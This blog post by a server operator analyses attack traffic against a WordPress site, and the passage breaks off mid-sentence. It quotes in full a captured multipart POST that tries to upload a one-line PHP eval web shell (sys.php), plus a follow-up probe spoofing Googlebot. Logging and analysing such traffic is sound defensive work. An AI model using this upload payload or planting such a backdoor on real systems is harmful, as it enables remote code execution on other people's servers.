This has been quite a week for novel attacks. Prior to the past few days it seemed like nearly 100% of the attacks I observed against my server fell into just a couple of categories:
1) credential guessing via /xmlrpc.php or /wp-login.php, and
2) attempts to exploit WordPress plugin “revslider” vulnerabilities to install malware to my server.
Today’s entry in the new and unusual category is from a server in the US in the colocrossing.com domain. It first attempted a
POST / request which my Apache firewall rules rejected and caused the source to be blacklisted. Notice that it is attempting to install the most minimal backdoor you can imagine. It’s just a single-line PHP script that simply evaluates whatever PHP statements the attacker hands it.
POST / HTTP/1.1 Referer: http://skepticism.us User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0 Accept: */* Content-Type: multipart/form-data; boundary=(UploadBoundary) Host: skepticism.us Content-Length: 340 Connection: Close --(UploadBoundary) Content-Disposition: form-data; name="yiw_contact"; filename="sys.php" Content-Type: text/php ...<?php @eval($_POST["err"]);?>45000 --(UploadBoundary) Content-Disposition: form-data; name="yiw_action" sendemail --(UploadBoundary) Content-Disposition: form-data; name="id_form" a_3_3 --(UploadBoundary)
It was apparently trying to exploit either a WordPress plugin or malware already present on my server to create a file named “sys.php” that did nothing more than
eval() whatever PHP statements it was handed in a POST request. I did a bit of googling and found a couple of WP plugins that might be relevant but was not able to definitively find a match.
When that upload failed it attempted to create the same file with the same content via a
POST /license.php request.
Finally, despite my server having returned HTTP 400 and 403 statuses for all the requests it tried to see if the “sys.php” file was present and could be fetched. Notice it’s sleazy attempt to impersonate the Google web crawler:
GET /sys.php HTTP/1.1 Referer: http://www.googlebot.com/bot.html User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: */* Host: skepticism.us Connection: Close
Notice the POST parameter has changed from